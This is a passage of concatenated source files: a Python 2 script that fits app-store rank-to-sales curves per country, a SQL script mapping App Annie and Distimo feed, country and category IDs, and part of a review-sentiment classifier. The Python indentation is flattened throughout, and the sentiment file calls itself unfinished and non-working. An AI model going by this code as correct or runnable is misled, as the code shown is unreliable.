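    # p[0] and p[1] are used, the trailing 1.0 entries of p0 are ignored.
    # Illustrative fit (coefficients from the commented p1 below): a=2.2e5,
    # b=-0.62 maps rank 1 to ~220,000 units and rank 100 to ~12,700.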
df = df[df['feed_id']==feed_id]
result = []
estimate_name = 'estimate_%s'%actual_type
df = df[df[device_rank]>0]
rank_ranges = [20, 60, 200, 1000]
df['rank_range'] = 20
df['rank_range'][df[device_rank]>20] = 60
df['rank_range'][df[device_rank]>60] = 200
df['rank_range'][df[device_rank]>200] = 1000
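    # Bucketing example: ranks 1-20 -> 20, 21-60 -> 60, 61-200 -> 200 and
    # 201+ -> 1000; each bucket gets its own least-squares fit below.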
for n, g in df.groupby(['store_id', 'category_id', 'feed_id']):
#end_date = datetime.datetime.strptime(n[3], '%Y-%m-%d')
#start_date = end_date - datetime.timedelta(days=7)
#end_date = end_date.strftime('%Y-%m-%d')
#start_date = start_date.strftime('%Y-%m-%d')
#g = df[(df['store_id']==n[0]) & (df['category_id']==n[1]) & (df['feed_id']==n[2]) & (df['date']>start_date) & (df['date']<=end_date)]
print n, g.shape
if g.shape[0]<10:
continue
if device_rank == 'iphone_rank':
test0 = iphone_ranks.copy()
else:
test0 = ipad_ranks.copy()
train0 = g.reset_index()
del train0['index']
app_ids = g[['app_id']].drop_duplicates().reset_index()
del app_ids['index']
kf = KFold(len(app_ids), n_folds=5, indices=True, shuffle=True)
test_out = []
for tr, te in kf:
test = train0[(train0['app_id'].isin(app_ids.loc[te]['app_id'])) & (train0['date']==train0['date'].max())]
train = train0[train0['app_id'].isin(app_ids.loc[tr]['app_id'])]
train = train[np.isnan(train[other_device_rank])==True]
train = train[train[actual_type]>0]
train = train[np.isnan(train['has_event_flag'])==True]
p0 = [1.0, 1.0, 1.0, 1.0]
#p1 = np.array([2.20083025e+05, -6.19775339e-01, 1.00000000e+00, 1.00000000e+00])
for rank_range in rank_ranges:
tt = train[train['rank_range']==rank_range]
try:
p1, success = optimize.leastsq(errfunc1, p0[:], args=(tt[[device_rank]].values, tt[actual_type].values), factor=0.1, maxfev=100000)
except Exception, e:
try:
p1, success = optimize.leastsq(errfunc1, p0[:], args=(train[[device_rank]].values, train[actual_type].values), factor=0.1, maxfev=100000)
except:
print estimate_name, rank_range, train.shape, e
print tt
t = test[test['rank_range']==rank_range]
t[estimate_name] = fitfunc1(p1, t[[device_rank]].values)
t = t[[device_rank, estimate_name, 'date']]
test_out.append(t)
test_out = pd.concat(test_out)
g = g.merge(test_out, on=[device_rank, 'date'])
del g['rank_range']
result.append(g)
result = pd.concat(result)
return result
def load_ranks_csv_zip(path):
filehandle = open(path, 'rb')
zfile = zipfile.ZipFile(filehandle)
data = StringIO.StringIO(zfile.read(zfile.namelist()[0])) #don't forget this line!
df = pd.read_csv(data)
return df
def load_ranks_file(path, store_ids=None, ranking_category_str_filter=None):
filename = os.path.split(path)[1]
assert filename.startswith('ranking_')
assert filename.endswith('.sql.bz2')
filename_date_str = filename[len('ranking_'):-len('.sql.bz2')]
filename_date = datetime.datetime.strptime(filename_date_str, '%Y-%m-%d').date()
ranking_feed_str_filter = frozenset(map(str, config.IOS_MARKETS_DICT.keys()))
if ranking_category_str_filter is None:
ranking_category_str_filter = frozenset(map(str, config.IOS_CATEGORIES_DICT.keys()))
else:
ranking_category_str_filter = frozenset(ranking_category_str_filter)
#f = open(path, 'r' )
f = bz2.BZ2File(path, 'r')
iphone_dfs = []
ipad_dfs = []
for line in f:
assert line.startswith(filename_date_str)
line_split = line.split('\t')
ranking_date_str, ranking_store_str, ranking_category_str, ranking_feed_str, ranking_list_str_unsplit = line_split
if ranking_store_str not in store_ids:
continue
if ranking_feed_str not in ranking_feed_str_filter:
continue
if ranking_category_str not in ranking_category_str_filter:
continue
store_id = ranking_store_str
category_id = ranking_category_str
feed_id = ranking_feed_str
assert ranking_list_str_unsplit.endswith('\n')
ranking_list_str_split = ranking_list_str_unsplit.rstrip().split(' ')
df = pd.DataFrame(ranking_list_str_split).reset_index()
df.rename(columns={0:'app_id', 'index':'rank'}, inplace=True)
df['rank'] += 1
df['date'] = ranking_date_str
df['store_id'] = store_id
df['category_id'] = category_id
if int(feed_id) < 100:
df.rename(columns={'rank': 'iphone_rank'}, inplace=True)
iphone_dfs.append(df)
df['feed_id'] = feed_id
else:
df.rename(columns={'rank': 'ipad_rank'}, inplace=True)
ipad_dfs.append(df)
df['feed_id'] = ipad_feeds[feed_id]
f.close()
iphone_dfs = pd.concat(iphone_dfs)
ipad_dfs = pd.concat(ipad_dfs)
iphone_dfs[['app_id', 'date', 'store_id', 'category_id', 'feed_id']] = iphone_dfs[['app_id', 'date', 'store_id', 'category_id', 'feed_id']].astype(str)
ipad_dfs[['app_id', 'date', 'store_id', 'category_id', 'feed_id']] = ipad_dfs[['app_id', 'date', 'store_id', 'category_id', 'feed_id']].astype(str)
#print iphone_dfs
#print ipad_dfs
return iphone_dfs.merge(ipad_dfs, on=['app_id', 'date', 'store_id', 'category_id', 'feed_id'], how='outer')
def read_actuals(date, store_id, value_type, table_name, ranked_apps=None):
conn = get_connection(DB_ACTUALS_STRING)
cur = conn.cursor()
if ranked_apps is None:
sql = 'SELECT app_id, %s FROM %s WHERE date = %%s AND store_id = %%s' % (value_type, table_name)
params = (date, store_id)
else:
sql = 'SELECT app_id, %s FROM %s WHERE date = %%s AND store_id = %%s AND app_id = ANY(%%s)' % (value_type, table_name)
params = (date, store_id, ranked_apps)
cur.execute(sql, params)
#print cur.mogrify(sql, params)
for app_id, value in cur:
yield {'app_id': app_id, table_name: value}
cur.close()
def read_events(date, store_id, ranked_apps=None):
conn = get_connection(DB_EVENTS_STRING)
cur = conn.cursor()
event = 2
if ranked_apps is None:
sql = 'SELECT app_id, type from aa_event WHERE type = %s AND date(date) = %s AND store_id = %s'
params = (event, date, store_id)
else:
sql = 'SELECT app_id, type from aa_event WHERE type = %s AND date(date) = %s AND store_id = %s AND app_id = ANY(%s)'
params = (event, date, store_id, ranked_apps)
cur.execute(sql, params)
#print cur.mogrify(sql, params)
for app_id, type in cur:
yield {'app_id': app_id, 'type': type}
cur.close()
def daterange(start_date, end_date):
result = []
for n in range(int ((end_date - start_date).days)):
result.append(start_date + datetime.timedelta(n))
return result
FILTER_ACTUALS = (
('sales', 'revenue'),
('downloads', 'units'),
)
def get_actuals(store_ids, DATES, table_name, value_type, ranked_apps=None):
result = []
for store_id, single_date in itertools.product(store_ids, DATES):
df = pd.DataFrame(list(read_actuals(single_date, int(store_id), value_type, table_name, ranked_apps)))
df['date'] = single_date.strftime('%Y-%m-%d')
df['store_id'] = store_id
result.append(df)
result = pd.concat(result)
result[['app_id', 'date', 'store_id']] = result[['app_id', 'date', 'store_id']].astype(str)
return result
def get_events(store_ids, DATES, ranked_apps=None):
result = []
for store_id, single_date in itertools.product(store_ids, DATES):
df = pd.DataFrame(list(read_events(single_date, int(store_id), ranked_apps)))
if df.shape[0]<1:
df = pd.DataFrame(columns=['app_id', 'date', 'store_id', 'type'])
del df['type']
df['date'] = single_date.strftime('%Y-%m-%d')
df['store_id'] = store_id
result.append(df)
result = pd.concat(result)
result[['app_id', 'date', 'store_id']] = result[['app_id', 'date', 'store_id']].astype(str)
return result
def process_single_country(store_id, DATES):
global CONN
path = COMPRESSED_RANKING_FILES_PATH
category_ids = map(str, config.IOS_CATEGORIES_DICT.keys())
#category_ids = ['36']
ranks_df = []
for single_date in DATES:
file = '%s/ranking_%s.sql.bz2'%(path, single_date.strftime('%Y-%m-%d'))
print 'loading %s'%file
df = load_ranks_file(file, [store_id], category_ids)
ranks_df.append(df)
ranks_df = pd.concat(ranks_df)
ranked_apps = list(map(int, ranks_df['app_id'].drop_duplicates().values))
CONN = None
downloads_df = get_actuals([store_id], DATES, 'downloads', 'units', ranked_apps)
sales_df = get_actuals([store_id], DATES, 'sales', 'revenue', ranked_apps)
actuals_df = pd.merge(downloads_df, sales_df, on=['date', 'app_id', 'store_id'], how='outer')
del sales_df
del downloads_df
df = pd.merge(actuals_df, ranks_df, on=['app_id', 'date', 'store_id'], how='outer')
#print df
del ranks_df
del actuals_df
CONN = None
events_df = get_events([store_id], DATES, ranked_apps)
events_df['has_event_flag'] = 1
#events_df.set_index(['app_id', 'date', 'store_id'], inplace=True)
#df.set_index(['app_id', 'date', 'store_id'], inplace=True)
#df = df.drop(events_df.index)
df = df.merge(events_df, on=['app_id', 'date', 'store_id'], how='outer')
del events_df
del ranked_apps
#df.reset_index(inplace=True)
device_ranks = ['iphone_rank', 'ipad_rank']
feed_actual_types = [['0', 'downloads'],
['1', 'downloads'],
['2', 'sales']]
iphone_estimates = []
for feed_id, actual_type in feed_actual_types:
r = train_models(df, feed_id, device_ranks[0], device_ranks[1], actual_type)
iphone_estimates.append(r)
iphone_estimates = pd.concat(iphone_estimates)
iphone_estimates['actual'] = iphone_estimates['downloads']
iphone_estimates['actual'][iphone_estimates['feed_id']=='2'] = iphone_estimates['sales']
iphone_estimates['iphone_estimate'] = iphone_estimates['estimate_downloads']
iphone_estimates['iphone_estimate'][iphone_estimates['feed_id']=='2'] = iphone_estimates['estimate_sales']
del iphone_estimates['downloads']
del iphone_estimates['sales']
del iphone_estimates['estimate_downloads']
del iphone_estimates['estimate_sales']
del iphone_estimates['ipad_rank']
ipad_estimates = []
for feed_id, actual_type in feed_actual_types:
r = train_models(df, feed_id, device_ranks[1], device_ranks[0], actual_type)
ipad_estimates.append(r)
ipad_estimates = pd.concat(ipad_estimates)
ipad_estimates['actual'] = ipad_estimates['downloads']
ipad_estimates['actual'][ipad_estimates['feed_id']=='2'] = ipad_estimates['sales']
ipad_estimates['ipad_estimate'] = ipad_estimates['estimate_downloads']
ipad_estimates['ipad_estimate'][ipad_estimates['feed_id']=='2'] = ipad_estimates['estimate_sales']
del ipad_estimates['downloads']
del ipad_estimates['sales']
del ipad_estimates['estimate_downloads']
del ipad_estimates['estimate_sales']
del ipad_estimates['iphone_rank']
del ipad_estimates['has_event_flag']
all_estimates = pd.merge(iphone_estimates, ipad_estimates, on=['store_id', 'category_id', 'feed_id', 'date', 'app_id', 'actual'], how='outer')
del iphone_estimates
del ipad_estimates
all_estimates.sort(['store_id', 'category_id', 'feed_id', 'date', 'iphone_rank', 'ipad_rank'], inplace=True)
all_estimates.to_csv('%s/benchmark_data_%s_%s.csv'%(OUT_DIR, store_id, DATES[-1]),index=False)
def main():
store_ids = ['143441',
'143465',
#'143466',
'143462',
'143444'
]
store_ids = ['143441']
store_ids = map(str, config.IOS_STORES_DICT.keys())
DATES = daterange(start_date, end_date)
print DATES
for store_id, date in itertools.product(store_ids, DATES):
end_date2 = date + datetime.timedelta(days=1)
start_date2 = date - datetime.timedelta(days=6)
dates = daterange(start_date2, end_date2)
print store_id, dates
out_file = '%s/benchmark_data_%s_%s.csv'%(OUT_DIR, store_id, dates[-1])
out_file_bz2 = '%s/benchmark_data_%s_%s.csv.bz2'%(OUT_DIR, store_id, dates[-1])
print out_file
if os.path.isfile(out_file) or os.path.isfile(out_file_bz2):
continue
try:
process_single_country(store_id, dates)
except Exception as e:
print e, store_id, date
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print(exc_type, fname, exc_tb.tb_lineno)
if __name__ == '__main__':
main()
<file_sep>/int-vs-m-benchmark/sql/ios/1000h1-create_appannie_distimo_mappings.sql
/*
Create (hard-coded) mappings between App Annie and Distimo tables.
*/
/* Mappings between feed and (device, type) */
drop table if exists aa_benchmarking_ios.feed_device_type_mappings;
create table aa_benchmarking_ios.feed_device_type_mappings(
feed int unsigned not null,
feed_name varchar(20) not null,
device_id TINYINT unsigned NOT NULL,
type ENUM('paid','gross','free') NOT NULL,
constraint primary key (feed),
index(device_id, type));
insert into aa_benchmarking_ios.feed_device_type_mappings
(feed, feed_name, device_id, type)
values
(0, "IPHONE_FREE", 1, 'free'),
(1, "IPHONE_PAID", 1, 'paid'),
(2, "IPHONE_GROSSING", 1, 'gross'),
(100, "IPAD_PAID", 2, 'paid'),
(101, "IPAD_FREE", 2, 'free'),
(102, "IPAD_GROSS", 2, 'gross');
/* Country mappings using names. */
drop temporary table if exists temp.aa_countries;
create temporary table temp.aa_countries (
id int,
name varchar(40)) ;
insert into temp.aa_countries
(id, name)
values
(143441, 'United States'),
(143442, 'France'),
(143443, 'Germany'),
(143444, 'United Kingdom'),
(143445, 'Austria'),
(143446, 'Belgium'),
(143447, 'Finland'),
(143448, 'Greece'),
(143449, 'Ireland'),
(143450, 'Italy'),
(143451, 'Luxembourg'),
(143452, 'Netherlands'),
(143453, 'Portugal'),
(143454, 'Spain'),
(143455, 'Canada'),
(143456, 'Sweden'),
(143457, 'Norway'),
(143458, 'Denmark'),
(143459, 'Switzerland'),
(143460, 'Australia'),
(143461, 'New Zealand'),
(143462, 'Japan'),
(143463, 'Hong Kong'),
(143464, 'Singapore'),
(143465, 'China'),
(143466, 'South Korea'),
(143467, 'India'),
(143468, 'Mexico'),
(143469, 'Russia'),
(143470, 'Taiwan'),
(143471, 'Vietnam'),
(143472, 'South Africa'),
(143473, 'Malaysia'),
(143474, 'Philippines'),
(143475, 'Thailand'),
(143476, 'Indonesia'),
(143477, 'Pakistan'),
(143478, 'Poland'),
(143479, 'Saudi Arabia'),
(143480, 'Turkey'),
(143481, 'United Arab Emirates'),
(143482, 'Hungary'),
(143483, 'Chile'),
(143485, 'Panama'),
(143486, 'Sri Lanka'),
(143487, 'Romania'),
(143489, 'Czech Republic'),
(143491, 'Israel'),
(143493, 'Kuwait'),
(143494, 'Croatia'),
(143495, '<NAME>'),
(143496, 'Slovakia'),
(143497, 'Lebanon'),
(143498, 'Qatar'),
(143499, 'Slovenia'),
(143501, 'Colombia'),
(143502, 'Venezuela'),
(143503, 'Brazil'),
(143504, 'Guatemala'),
(143505, 'Argentina'),
(143506, 'El Salvador'),
(143507, 'Peru'),
(143508, 'Dominican Republic'),
(143509, 'Ecuador'),
(143510, 'Honduras'),
(143511, 'Jamaica'),
(143512, 'Nicaragua'),
(143513, 'Paraguay'),
(143514, 'Uruguay'),
(143515, 'Macau'),
(143516, 'Egypt'),
(143517, 'Kazakhstan'),
(143518, 'Estonia'),
(143519, 'Latvia'),
(143520, 'Lithuania'),
(143521, 'Malta'),
(143523, 'Moldova'),
(143524, 'Armenia'),
(143525, 'Botswana'),
(143526, 'Bulgaria'),
(143528, 'Jordan'),
(143529, 'Kenya'),
(143530, 'Macedonia'),
(143531, 'Madagascar'),
(143532, 'Mali'),
(143533, 'Mauritius'),
(143534, 'Niger'),
(143535, 'Senegal'),
(143536, 'Tunisia'),
(143537, 'Uganda'),
(143538, 'Anguilla'),
(143539, 'Bahamas'),
(143540, 'Antigua and Barbuda'),
(143541, 'Barbados'),
(143542, 'Bermuda'),
(143543, 'British Virgin Islands'),
(143544, 'Cayman Islands'),
(143545, 'Dominica'),
(143546, 'Grenada'),
(143547, 'Montserrat'),
(143548, 'St. Kitts and Nevis'),
(143549, 'St. Lucia'),
(143550, 'St. Vincent and The Grenadines'),
(143551, 'Trinidad and Tobago'),
(143552, 'Turks and Caicos'),
(143553, 'Guyana'),
(143554, 'Suriname'),
(143555, 'Belize'),
(143556, 'Bolivia'),
(143557, 'Cyprus'),
(143558, 'Iceland'),
(143559, 'Bahrain'),
(143560, 'Brunei'),
(143561, 'Nigeria'),
(143562, 'Oman'),
(143563, 'Algeria'),
(143564, 'Angola'),
(143565, 'Belarus'),
(143566, 'Uzbekistan'),
(143568, 'Azerbaijan'),
(143571, 'Yemen'),
(143572, 'Tanzania'),
(143573, 'Ghana'),
(143575, 'Albania'),
(143576, 'Benin'),
(143577, 'Bhutan'),
(143578, 'Burkina Faso'),
(143579, 'Cambodia'),
(143580, '<NAME>'),
(143581, 'Chad'),
(143582, 'Congo'),
(143583, 'Fiji'),
(143584, 'Gambia'),
(143585, 'Guinea-Bissau'),
(143586, 'Kyrgyzstan'),
(143587, 'Laos'),
(143588, 'Liberia'),
(143589, 'Malawi'),
(143590, 'Mauritania'),
(143591, 'Micronesia'),
(143592, 'Mongolia'),
(143593, 'Mozambique'),
(143594, 'Namibia'),
(143484, 'Nepal'),
(143595, 'Palau'),
(143597, 'Papua New Guinea'),
(143598, 'Sao Tome and Principe'),
(143599, 'Seychelles'),
(143600, 'Sierra Leone'),
(143601, 'Solomon Islands'),
(143602, 'Swaziland'),
(143603, 'Tajikistan'),
(143604, 'Turkmenistan'),
(143492, 'Ukraine'),
(143605, 'Zimbabwe');
drop table if exists aa_benchmarking_ios.country_mappings;
create table aa_benchmarking_ios.country_mappings (
`store_id` int unsigned NOT NULL,
`appannie_name` varchar(48) NOT NULL,
`iso_code` varchar(2) NOT NULL,
`country_id` smallint(5) unsigned NOT NULL,
`distimo_name` varchar(48) NOT NULL,
constraint primary key(store_id),
index(country_id),
index(iso_code)
)
select
aa_cn.id as store_id,
aa_cn.name as appannie_name,
cn.iso_code,
cn.id as country_id,
cn.name as distimo_name
from
generic.countries gen_cn
join temp.aa_countries aa_cn
using(name)
join appstore.countries cn
using(iso_code)
;
/* Category mappings using similar names. */
drop temporary table if exists temp.aa_categories;
create temporary table temp.aa_categories
(id int, name varchar(40)) ;
insert into temp.aa_categories
(id, name)
values
(36, 'Overall'),
(100, 'Applications'),
(6000, 'Business'),
(6001, 'Weather'),
(6002, 'Utilities'),
(6003, 'Travel'),
(6004, 'Sports'),
(6005, 'Social Networking'),
(6006, 'Reference'),
(6007, 'Productivity'),
(6008, 'Photo and Video'),
(6009, 'News'),
(6010, 'Navigation'),
(6011, 'Music'),
(6012, 'Lifestyle'),
(6013, 'Health and Fitness'),
(6014, 'Games'),
(6015, 'Finance'),
(6016, 'Entertainment'),
(6017, 'Education'),
(6018, 'Books'),
(6020, 'Medical'),
(6021, 'Newsstand'),
(6022, 'Catalogs'),
(6023, 'Food and Drink'),
(7001, 'Games Action'),
(7002, 'Games Adventure'),
(7003, 'Games Arcade'),
(7004, 'Games Board'),
(7005, 'Games Card'),
(7006, 'Games Casino'),
(7007, 'Games Dice'),
(7008, 'Games Education'),
(7009, 'Games Family'),
(7010, 'Games Kids'),
(7011, 'Games Music'),
(7012, 'Games Puzzle'),
(7013, 'Games Racing'),
(7014, 'Games Role Playing'),
(7015, 'Games Simulation'),
(7016, 'Games Sports'),
(7017, 'Games Strategy'),
(7018, 'Games Trivia'),
(7019, 'Games Word'),
(360, 'Kids'),
(361, 'Kids 5 & Under'),
(362, 'Kids Ages 6-8'),
(363, 'Kids Ages 9-11');
drop table if exists aa_benchmarking_ios.category_mappings;
create table aa_benchmarking_ios.category_mappings (
`appannie_category_id` smallint(5) unsigned NOT NULL,
`appannie_name` varchar(80) NOT NULL,
`distimo_category_id` smallint(5) unsigned NOT NULL,
`distimo_name` varchar(80) NOT NULL,
constraint primary key (appannie_category_id, distimo_category_id),
index(distimo_category_id, appannie_category_id))
select
aa_cg.id as appannie_category_id,
aa_cg.name as appannie_name,
cg.id as distimo_category_id,
cg.name as distimo_name
from
appstore.categories cg
join (
SELECT
DISTINCT category_id
FROM
temp.rankings
) x
ON cg.id = x.category_id
join temp.aa_categories aa_cg
ON (
cg.name = aa_cg.name
OR REPLACE(cg.name, '-', ' ') = aa_cg.name
OR REPLACE(cg.name, '&', 'and') = aa_cg.name
OR REPLACE(cg.name, '-Educational', ' Education') = aa_cg.name
OR cg.name = CONCAT('Top ', aa_cg.name)
OR cg.name = CONCAT('All ', aa_cg.name)
)
;<file_sep>/review-sentiment-analysis/lib/sentiment_get_word_weights_rewrite.py
"""
!!! NOTE: STILL WORK IN PROGRESS, DOES NOT WORK YET !!!
"""
"""
This script classifies reviews into topics defined in SEED_TERMS,
then aggregates per app.
@param PHASE: The phases of the script to run from scratch.
Each phase acts as a checkpoint; if the run is stopped it can be resumed from the most recently finished phase.
1 - run
0 - don't run
@param DATA_DIR: All data will be read from this directory
@reviews_file: Name of the file containing raw reviews in csv format
id,app_id,store_id,rating,date,title,version,text,reviewer,userreview_id
@JOBS: total number of cores to run on in parallel, 1 means single-core processing
@PARALLEL_CHUNK_SIZE: total rows to process in each JOB;
more rows will reduce process switching and running time but increase memory usage.
@MIN_N: Minimum size of ngrams, 2 is already optimal
@MAX_N: Maximum size of ngrams, 2 is optimal.
@SEED_TERMS: dictionary where keys are topics and values are lists of seed words.
@return: Percentage of reviews aggregated by topic and app.
@note: Params are hard-coded here after the imports
"""
import cPickle
import gc
import itertools
import nltk.data
import numpy as np
import os
import pandas as pd
import random
import re
import string
from constants import DATA_DIR, reviews_file, SOME_FIXED_SEED, DELIMITER, JOBS, PARALLEL_CHUNK_SIZE, MIN_N, MAX_N
from copy import copy, deepcopy
from gensim import corpora
from joblib import Parallel, delayed, Memory
from nltk.tokenize import wordpunct_tokenize
from nltk.corpus import stopwords
from os import listdir
from os.path import isfile, join
from tempfile import mkdtemp
from corpora import CONTRACTIONS, SEED_TERMS
"""
For each phase description look at the comments below
"""
PHASE = {0: 1,
1: 1,
2: 1,
3: 1,
4: 1,
5: 1,
6: 1,
7: 1,
8: 1,
9: 1}
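# A minimal sketch of the SEED_TERMS shape assumed throughout; the real
# dictionary lives in corpora.py and may differ. Keys are topics, values are
# seed words; 'positive' and 'negative' are reserved for sentiment, e.g.:
# SEED_TERMS = {'positive': ['great', 'love'],
#               'negative': ['bad', 'broken'],
#               'crashes': ['crash', 'freeze']}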
reviews_path = '{}/{}'.format(DATA_DIR, reviews_file)
np.random.seed(SOME_FIXED_SEED)
TMP_DIR = '{}/tmp'.format(DATA_DIR)
cachedir = mkdtemp()
memory = Memory(cachedir=cachedir, verbose=0)
MEM_FOLDER = '{}/shm'.format(DATA_DIR)
def clean_temporary_directory(temp_dir=TMP_DIR):
for the_file in os.listdir(temp_dir):
file_path = os.path.join(temp_dir, the_file)
try:
os.unlink(file_path)
except Exception, e:
print e
def get_corpora(seed_terms=SEED_TERMS):
stop_words = _get_stopwords(seed_terms)
main_topics, sentiment_topics = _get_topics(seed_terms)
control_doc = _get_control_doc(seed_terms)
return stop_words, main_topics, sentiment_topics, control_doc
def _get_stopwords(seed_terms):
stop_words = stopwords.words('english')
for v in seed_terms.values():
for w in v:
if w in stop_words:
stop_words.remove(w)
return stop_words
def _get_topics(seed_terms):
sentiment_topics = ['positive', 'negative']
main_topics = seed_terms.keys()
for sentiment in sentiment_topics:
main_topics.remove(sentiment)
return main_topics, sentiment_topics
def _get_control_doc(seed_terms):
control_doc = seed_terms.keys()
control_doc.extend([item for sublist in seed_terms.values() for item in sublist])
control_doc = set(control_doc)
return control_doc
"""
PHASE 0
Clean temporary directory
"""
control = string.printable.replace('\t\n\r\x0b\x0c', '')
#sw = ['a']
sentence_detector = nltk.data.load('tokenizers/punkt/english.pickle')
"""
PHASE 1
Read reviews from csv
"""
def load_reviews(reviews_path):
index_df = pd.read_csv(reviews_path)
df = index_df[['id', 'title', 'text']]
return df, index_df
def preprocess_text(df, jobs=JOBS, mem_folder=MEM_FOLDER, parallel_chunk_size=PARALLEL_CHUNK_SIZE):
index = df.index.values
chunks_index = [index[x:x+parallel_chunk_size] for x in xrange(0, len(index), parallel_chunk_size)]
def producer():
for chunk in chunks_index:
yield (chunk, df.loc[chunk])
D = delayed(_process_chunk)
a = [D(i[0], i[1]) for i in producer()]
os.system('taskset -p 0xffffffff %d' % os.getpid())
Parallel(n_jobs=jobs, verbose=5, pre_dispatch=jobs, temp_folder=mem_folder)(a)
def _process_chunk(chunk, df):
"""
    Clean and preprocess text, convert to bag of words, generate DataFrame
@param chunk: index of chunk in original DataFrame
@param df: pandas DataFrame
@return: clean DataFrame
"""
df['text'] = df.apply(lambda x: '{}. {}'.format(x['title'], x['text']), axis=1)
del df['title']
_ = gc.collect()
df['text'] = df['text'].apply(_clean_text)
df['sentence'] = df['text'].apply(_detect_sentences)
del df['text']
df = _sentence_to_df(df)
df['review'] = df['review'].apply(_to_bag_of_words)
df['ngrams'] = df['review'].apply(lambda x: x[1])
df['total_ngrams'] = df['review'].apply(lambda x: x[2])
df = df[df['total_ngrams'] > 0]
df['review'] = df['review'].apply(lambda x: x[0])
cPickle.dump(df, open('{}/chunk_{}-{}.pk'.format(TMP_DIR, chunk[0], chunk[len(chunk)-1]), "wb"))
def _clean_text(x, contractions=CONTRACTIONS):
"""
Clean text by replacing contractions and illegal characters
@param x: String to clean
@return: Clean string
"""
x = x.lower()
x = ''.join([c for c in x if c in control])
for k, v in contractions.iteritems():
x = x.replace(k, v)
return x
def _detect_sentences(x):
"""
Split string into sentences
@param x: String to split
@return: List of sentences
"""
sentences = sentence_detector.tokenize(x)
result = []
for sentence in sentences:
s = re.split('[,:;]+', sentence)
result.extend(s)
return result
def _sentence_to_df(df):
"""
Split a list in a pandas row into a row per sentence.
@param df: Dataframe containing list of sentences.
@return: unfolded DataFrame
"""
r = []
for g in df.iterrows():
ndf = pd.DataFrame(g[1]['sentence'])
ndf['id'] = g[1]['id']
r.append(ndf)
df = pd.concat(r)
del r
df['review'] = df[0]
del df[0]
_ = gc.collect()
return df
# The stop_words default is evaluated once at import time via _get_stopwords,
# so the apply() call above can invoke this with a single argument.
def _to_bag_of_words(x, stop_words=_get_stopwords(SEED_TERMS)):
"""
Convert string to bag of words (tokenize)
@param x: String to be tokenized
@return: bag of words list, ngrams list, total ngrams
"""
pattern = re.compile("[_\W]+")
x = wordpunct_tokenize(x)
x = [pattern.sub('', w) for w in x]
x = [w for w in x if not w in stop_words]
x = [w for w in x if len(w) > 2]
n_tokens = len(x)
n_grams = []
bow = []
local_min = MIN_N if MIN_N < n_tokens else n_tokens
for i in xrange(n_tokens):
for j in xrange(i+local_min, min(n_tokens, i+MAX_N)+1):
n = x[i:j]
n_grams.append(n)
bow.append(DELIMITER.join(n))
ngram_count = len(bow)
return bow, n_grams, ngram_count
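# Example (assuming DELIMITER is a single space and MIN_N == MAX_N == 2):
# the tokens ['great', 'game', 'crashes'] yield the bigram bag
# ['great game', 'game crashes'] and ngram_count == 2.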
def generate_dictionary(df, control_doc, seed_terms=SEED_TERMS, tmp_dir=TMP_DIR):
dictionary = None
first = True
chunk_files = []
for f in listdir(tmp_dir):
if f.startswith('chunk') and f.endswith('.pk'):
path = join(tmp_dir, f)
if isfile(path):
chunk_files.append(path)
if PHASE[3]:
df = cPickle.load(open(path, "rb"))
if first:
first = False
dictionary = corpora.Dictionary(list(df['review']))
else:
dictionary.add_documents(list(df['review']))
dictionary.filter_extremes(no_below=4, no_above=1.0, keep_n=None)
dictionary.compactify()
print 'len after filter: {}'.format(len(dictionary))
dictionary.add_documents([control_doc])
dictionary.save('{}/dictionary.dict'.format(DATA_DIR)) # store the dictionary, for future reference
print 'initial len: {}'.format(len(dictionary))
"""
Here we filter out low frequency ngrams from the dictionary.
If the ngram appears less than no_below times we drop it.
"""
total_frequencies = {}
for chunk_file in chunk_files:
df = cPickle.load(open(chunk_file, "rb"))
for doc in list(df['review']):
bow_dict = dictionary.doc2bow(doc)
for w in bow_dict:
if w[0] in total_frequencies:
total_frequencies[w[0]] += w[1]
else:
total_frequencies[w[0]] = w[1]
cPickle.dump(total_frequencies, open('{}/total_frequencies.pk'.format(TMP_DIR), "wb"))
seed_ids = {}
for topic in seed_terms:
seed_ids[topic] = []
for dict_id in dictionary:
dict_term = dictionary[dict_id].split(' ')
for topic, seeds in seed_terms.iteritems():
for seed in seeds:
if seed in dict_term:
seed_ids[topic].append(dict_id)
for topic in seed_terms:
seed_ids[topic] = set(seed_ids[topic])
new_positive = []
for dict_id in seed_ids['positive']:
dict_term = dictionary[dict_id].split(' ')
if not 'not' in dict_term and not 'no' in dict_term:
new_positive.append(dict_id)
seed_ids['positive'] = copy(new_positive)
cPickle.dump(seed_ids, open('{}/seed_ids.pk'.format(TMP_DIR), "wb"))
return df
def load_dictionary():
dictionary = corpora.Dictionary.load('{}/dictionary.dict'.format(DATA_DIR))
total_frequencies = cPickle.load(open('{}/total_frequencies.pk'.format(TMP_DIR), "rb"))
seed_ids = cPickle.load(open('{}/seed_ids.pk'.format(TMP_DIR), "rb"))
return dictionary, total_frequencies, seed_ids
def _clean_df(chunk_file, dictionary):
"""
Clean dataframe by converting reviews to gensim bag of words.
If the review ends as an empty bag of words we filter it out.
    This happens when the review is composed of low frequency ngrams, generally gibberish.
@param chunk_file: DataFrame
@return: pickled clean dataframe to disk
"""
df = cPickle.load(open(chunk_file, "rb"))
df['freq'] = df['review'].apply(dictionary.doc2bow)
df['total_ngrams'] = df['freq'].apply(lambda x: np.array(x).sum(axis=0))
df['total_ngrams_a'] = df['total_ngrams'].apply(type)
df = df[df['total_ngrams_a'] == np.ndarray]
del df['total_ngrams_a']
_ = gc.collect()
df['total_ngrams'] = df['total_ngrams'].apply(lambda x: x[1])
df = df[df['total_ngrams'] > 0]
df['ngrams'] = df['freq'].apply(lambda x: set([a[0] for a in x]))
cPickle.dump(df, open(chunk_file, "wb"))
gc.collect()
"""
PHASE 4
Clean DataFrame
Generate ngrams
"""
def clean_dataframe(chunk_files, dictionary):
    D = delayed(_clean_df)
    a = [D(i, dictionary) for i in chunk_files]
os.system('taskset -p 0xffffffff %d' % os.getpid())
Parallel(n_jobs=JOBS, verbose=5, pre_dispatch=JOBS, temp_folder=MEM_FOLDER)(a)
def _make_topic_corpus(chunk_file, seed_ids, dictionary, seed_terms=SEED_TERMS):
"""
    Generate a corpus for each topic; if a review contains a seed word it is considered part of the topic
@param chunk_file: Dataframe to analyze
@return: dictionary with all the dataframes belonging to topic
"""
df = cPickle.load(open(chunk_file, "rb"))
corpus = {}
def seed_in_bow(x):
for w in x:
if w in seed_ids[topic]:
return True
return False
for topic in seed_terms:
reviews_filter = df['ngrams'].apply(seed_in_bow)
